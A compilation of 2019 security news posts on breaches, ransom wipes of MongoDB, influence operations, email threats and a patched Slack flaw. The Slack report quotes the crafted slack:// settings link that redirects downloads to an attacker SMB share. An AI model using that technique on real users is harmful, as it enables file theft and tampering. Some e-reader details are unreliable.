So, should you require your family to delete its favorite apps? Not even. A certain degree of vulnerability comes with the territory of a digital culture.

However, what you can and should do to ease that sense of vulnerability is to adopt proactive safety habits — and teach your kids — to layer up safeguards wherever possible.

Tips to Help Your Family Avoid Being Hacked

Don’t be complacent. Talk to your kids about digital responsibility and to treat each app like a potential doorway that could expose your family’s data. Take the time to sit down and teach kids how to lock down privacy settings and the importance of keeping device software updated. Counsel them not to accept data breaches as a regular part of digital life and how to fight back against online criminals with a security mindset.

Power up your passwords. Teach your kids to use unique, complex passwords for all of their apps and to use multi-factor authentication when it’s offered.

Auto update all apps. App developers regularly issue updates to fix security vulnerabilities. You can turn on auto updates in your device’s Settings.

Add extra security. If you can add a robust, easy-to-install layer of security to protect your family’s devices, why not? McAfee mobile solutions are available for both iOS and Android and will help safeguard devices from cyber threats.

Avoid suspicious links. Hackers send malicious links through text, messenger, email, pop-ups, or within the context of an ongoing conversation. Teach your kids to be aware of these tricks and not to click suspicious links or download unfamiliar content.

Share responsibly. When you use chat apps like WhatsApp or Facebook Messenger, it’s easy to forget that an outsider can access your conversation. Remind your children that nothing is private — even messaging apps that feel as if a conversation is private. Hackers are looking for personal information (birthday, address, hometown, or names of family members and pets) to crack your passwords, steal your identity, or gain access to other accounts.

What to Do If You Get Hacked

If one of your apps is compromised, act quickly to minimize the fallout. If you’ve been hacked, you may notice your device running slowly, a drain on your data, strange apps on your home screen, and evidence of calls, texts or emails you did not send.

Social media accounts. For Facebook and other social accounts, change your password immediately and alert your contacts that your account was compromised.

Review your purchase history. Check to see if there are any new apps or games installed that you didn’t authorize. You may have to cancel the credit card associated with your Google Play or iTunes account.

Revoke app access, delete old apps. Sometimes it’s not a person but a malicious app you may have downloaded that is wreaking havoc on your device. Encourage your kids to go through their apps and delete suspicious ones as well as apps they don’t use.

Bugs and breaches are part of our digital culture, but we don’t have to resign ourselves to being targets. By sharing knowledge and teaching kids to put on a security mindset, together, you can stay one step ahead of a cybercrook’s digital traps.

The post Breaches and Bugs: How Secure are Your Family’s Favorite Apps? appeared first on McAfee Blogs.

Account Hijacking Forum OGusers Hacked

Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.

On May 12, the administrator of OGusers explained an outage to forum members by saying a hard drive failure had erased several months’ worth of private messages, forum posts and prestige points, and that he’d restored a backup from January 2019. Little did the administrators of OGusers know at the time, but that May 12 incident coincided with the theft of the forum’s user database, and the wiping of forum hard drives.

On May 16, the administrator of rival hacking community RaidForums announced he’d uploaded the OGusers database for anyone to download for free.

The administrator of the hacking community Raidforums on May 16 posted the database of passwords, email addresses, IP addresses and private messages of more than 113,000 users of Ogusers[.]com.

“On the 12th of May 2019 the forum was breached [and] 112,988 users were affected,” the message from RaidForums administrator Omnipotent reads. “I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).

The publication of the OGuser database has caused much consternation and drama for many in the community, which has become infamous for attracting people involved in hijacking phone numbers as a method of taking over the victim’s social media, email and financial accounts, and then reselling that access for hundreds or thousands of dollars to others on the forum.

Several threads on OGusers quickly were filled with responses from anxious users concerned about being exposed by the breach. Some complained they were already receiving phishing emails targeting their OGusers accounts and email addresses. 

Meanwhile, the official Discord chat channel for OGusers has been flooded with complaints and expressions of disbelief at the hack. Members vented their anger at the main forum administrator, who uses the nickname “Ace,” claiming he altered the forum functionality after the hack to prevent users from removing their accounts. One user on the Discord chat summed it up:

“Ace be like:

-not replace broken hard drives, causing the site to time warp back four months
– not secure website, causing user info to be leaked
– disable selfban so people can’t leave”

It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.

Simple Mitigation Tips For Securing Android E-Readers

Android e-readers are not taking any headlines when manufacturers are announcing their products. However, the e-ink based Android tablets are still selling like hotcakes, given it provides more flexibility than the similarly priced Amazon Kindle e-readers. Like the latter, no matter what type of book you open, the text is rendered against an old type of paper called sepia. There is an option under the setting menu, and you can add different gradation backgrounds such as wood, leather, solid color and so on. Reading on white background may be stressful for some, and Android e-readers provide the ability to change the background color of a book to the color that the user prefers. Not only can users change the background, but they can also change the color of text, hyperlinks, and so on.

If users like fonts, line spacing, alignment, and control of margins, they will love Android e-readers. There are many options to change all these features, Android always has the edge over kindle when it comes to customization. It’s good to customize the settings that they apply to whatever book the user opens next. Page turning speeds are fast, impressive, and users can read in both horizontal and vertical modes (ie, horizontal and vertical). The direction is locked by default but can be canceled immediately in the settings menu. The only thing that potentially may annoy users is the whole page turning experience, a strange line that turns the screen off every time users turn a page. It’s not just a screen refresh, but page feed takes a bit more time than the behavior of the Amazon Kindle. As users send pages, gestures, and swipe, these lines will follow and fill the page.

But unlike the Kindle e-readers, which provides basic e-ink reading capability, Android e-readers are full-time Android tablets but with an e-ink screen. That means all the vulnerabilities of a regular Android device affects the Android e-readers, in reciprocity, the feature that keeps Android secure such as the built-in antimalware, Google Play Protect is also installed in the Android e-reader device. The only weak part of Android e-readers is they are considered as legacy devices, that means it only comes with Android 4.0 Ice Cream Sandwich, with the latest version rocking Android 6.0 Marshmallow which was released three years ago.

Android e-readers are no longer occupying store shelves, and usually can only be bought from online stores. As Android 4.x and 6.x are considered old versions of Android, and no longer receives patches from Google, a heightened level of security awareness is required to continue the safe usage of the device.

Here are some of our recommendations:

Only associate your Google Account if you need to access the Google Play Store
That means the Google Account does not need to be saved on the device. Associate the Google account only if a new app needs to be downloaded from the Play Store. That will help preserve the security and privacy of the Google account in the event the e-reader captures malware. In an infected Android device, the associated Google Account is at risk of getting used for nefarious purposes. So better not have the account associated with the device if there are no new apps that need to be installed.

Turn-off Bluetooth component if not used
Keep the device isolated, without access to Bluetooth, means there is no chance from a 3rd party to send files to the e-reader.

Only use legitimate apps (never sideload)
Apps should only be downloaded from the official source, the Google Play Store. This way, the Google Play Protect will kick-in and scan the apps first before installation.

See if using a full Android tablet or phone will be a better experience
Evaluate if you really need to continue using the e-reader, it is using a very old Android version which is considered as not safe for typical daily usage when connected online. Replace the device with a regular tablet or phone, if not keep it offline instead of being visible in the public Internet.

Also, Read:

7 Android Security Features You Never Knew You Needed

Nexus and Pixel devices now has Google’s Android Security Patch

Fortnite’s Accidental Revelation of Android’s Security Weakness

Google Launches Play Protect for Android Device Security

The 6 Deadly Mobile Security Threats

The post Simple Mitigation Tips For Securing Android E-Readers appeared first on .

Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online
over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and request a ransom to restore data is common, experts observed several campaigns targeting unsecured archive exposed online.

In the last wave of attacks, crooks don’t request the payment of a specific ransom amount, instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the expert Sanyam Jain as the person that discovered the deleted MongoDB databases.

“this person might be charging money in cryptocurrency according to the sensitiveness of the database.” explained Jain.

The expert discovered 12,564 unprotected MongoDB DBs that were wiped by an attacker tracked as Unistellar, he searched the text “hacked_by_unistellar” that the attacker left in the message.

Making the same search on Shodan experts at BleepingComputer found a smaller number, 7,656 databases, while doing the same search I found 8.133 compromised installs exposed online.
It is likely the attacker has automated its attacks chain due to the lange number of MongoDB databases deleted by Unistellar.

Unistellar MongoDB wiped

Jain first discovered the attacks on April 24, the note left by the Unistellar attacker reads “Restore ? Contact :

The attacker used two email addresses in these attacks, or

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoBD)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook, this time it was not operated by Russia but Israel’s Archimedes Group

Facebook uncovered and blocked a misinformation campaign powered by Israel’ Archimedes Group, the corporation used fake accounts to manipulated political campaigns.

According to Facebook, the Archimedes Group used hundreds of pages, accounts, and groups in the attempt to influence the public sentiment on political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger, and Tunisia), Latin America and Southeast Asia. The operators behind this campaign posed themselves as local people and organizations to fuel the debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the efforts of the corporations in spreading fake news to change the perception of the reality:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed, the following image is related to Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.


Archimedes Group invested a total of $812,000 on Facebook ads, these figures could give you an idea about the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is, who paid this campaign?

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Our Long Collective Struggle To Secure Enterprise Email

Email is the oldest service on the Internet, launched in the 1970’s, it is older than the WWW or the World Wide Web itself for more than three decades. However, the fundamentals of sending and receiving email have not fundamentally changed, in fact, all the weaknesses of the email systems of the 70s are still hounding us today. In 1978, we witnessed the first spam email sent to thousands of corporate email users. The other threats such as malware and phishing through email followed soon after.

These threats take advantage of the basic foundation of email, which is accessibility and open-ended approach to transferring information. Security is never the foundation of email when it was first conceptualized by the fathers of the Internet. It is a direct product of the TCP/IP (Transmission Control Protocol/Internet Protocol), where scientists are able to communicate with one another the results of their experiments and research.

When email and the rest of the Internet became a “public sphere” as opposed to the initial “for military use only”, opportunity seekers look at it and found a new home when it comes to exploiting the weaknesses at the expense of unsuspecting users. The number of cyber attacks targeting countries and companies is increasing, and information security measures are now a matter of life and death for companies. At the same time, however, the combination of business and IT has progressed, and while numerous IT investments are required, the amount of investment in security is a reality. Similarly, many IT personnel are busy with various tasks, making it difficult to specialize in security measures.

Under such circumstances, effective use of security solutions is essential to obtain a safe and secure environment including business partners and customers. Above all, the most important point is how to secure the security of “mail” which is said to occupy 80 to 90% of the attack path. It goes without saying that even among the damage caused by cyber attacks, it is information leakage that brings fatal damage to companies. Targeted attack emails and emails such as phishing emails often use messages that spoof legitimate senders, such as business partners, financial institutions, and public organizations. And the reason why the damage globally has been increasing in the last two decades is that the methods for infecting the sentences and malware described in such malicious emails have been refined.

Is there a permanent solution?
As an attack method by email, attachment files of malware such as ransomware and URL spoofing (redirection) are often used. In the latter case, if you click on the URL link in the mail, you will be diverted to a falsified website, etc. and you will be forced to download malware, etc. And please be aware that in such email-based attacks, the pattern of spam emails, which was previously thought to cause no direct harm to the system, is rapidly increasing.

Spam email is an advertising email sent indiscriminately to an unspecified number of people, often referred to as “spam”. In the past, the damage caused by spam emails was such that sending many unnecessary emails interfered with business operations, and the effort for deletion would be unrelentingly costly. However, recently, in addition to these, as mentioned above, it has become a trigger for malware infection or is being used for phishing scams. Also, there are more cases where Botnet, which sends large-scale spam emails, is the source of ransomware.

There is no other defense but for users to develop a sense of doubt when receiving emails. A reasonable level of suspicion does not hurt, in fact, it is even safer to actually call the sender of the email to verify if that person actually sent an email. There is no system that can 100% prevent email risks, but there will always be a human standing in the way. The point of getting a network infected or a company falling for spear phishing is the human user of the system representing the company. All employees are the frontliners in all corporate IT security arrangement.

Also, Read:

Avoid These Mistakes, Ensure Better Enterprise Security

Is It Possible To Have Email Security Without OpenPGP/S-MIME?

Mimecast Quarterly Report: 25% Of Spam and Malicious Emails Bypass Security Systems

How Enterprises Can Combat Cybersecurity Challenges On The Cloud

Can Artificial Intelligence Boost Future Email Security?

The post Our Long Collective Struggle To Secure Enterprise Email appeared first on .

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?

Continue reading...

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached German software company behind TeamViewer in 2016, this news was reported by the German newspaper Der Spiegel


According to the media outlet, Chinese state-sponsored hackers used the
Winnti trojan malware to infect the systems of the Company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns.  The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities were quickly blocked them to prevent major damages.

TeamViewer spokesperson revealed that the company investigated the attempts of intrusion, but did not find any evidence of exposure for customer data and sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time the company published a statement to exclude it was breached by hackers:

Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services,

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that that is it possible to use slack:// links to change change Slack app settings if clicked, including the
PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example, a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Slack download

Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But, is it possible to paste the link to Slack channels where attackers are not part of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact. can subscribe to RSS feeds to populate a channel with site updates which can contain links. 

In this case, the hacker has to trick the victim into clicking on a specially crafted RSS feed link posted online. The download location can be changed even if the attacker has not access to the victim’s Slack workspace.

Lets consider an example with, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”

The flaw has been classified as “medium severity” because it required user interaction. Slack awarded $500 the researcher under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.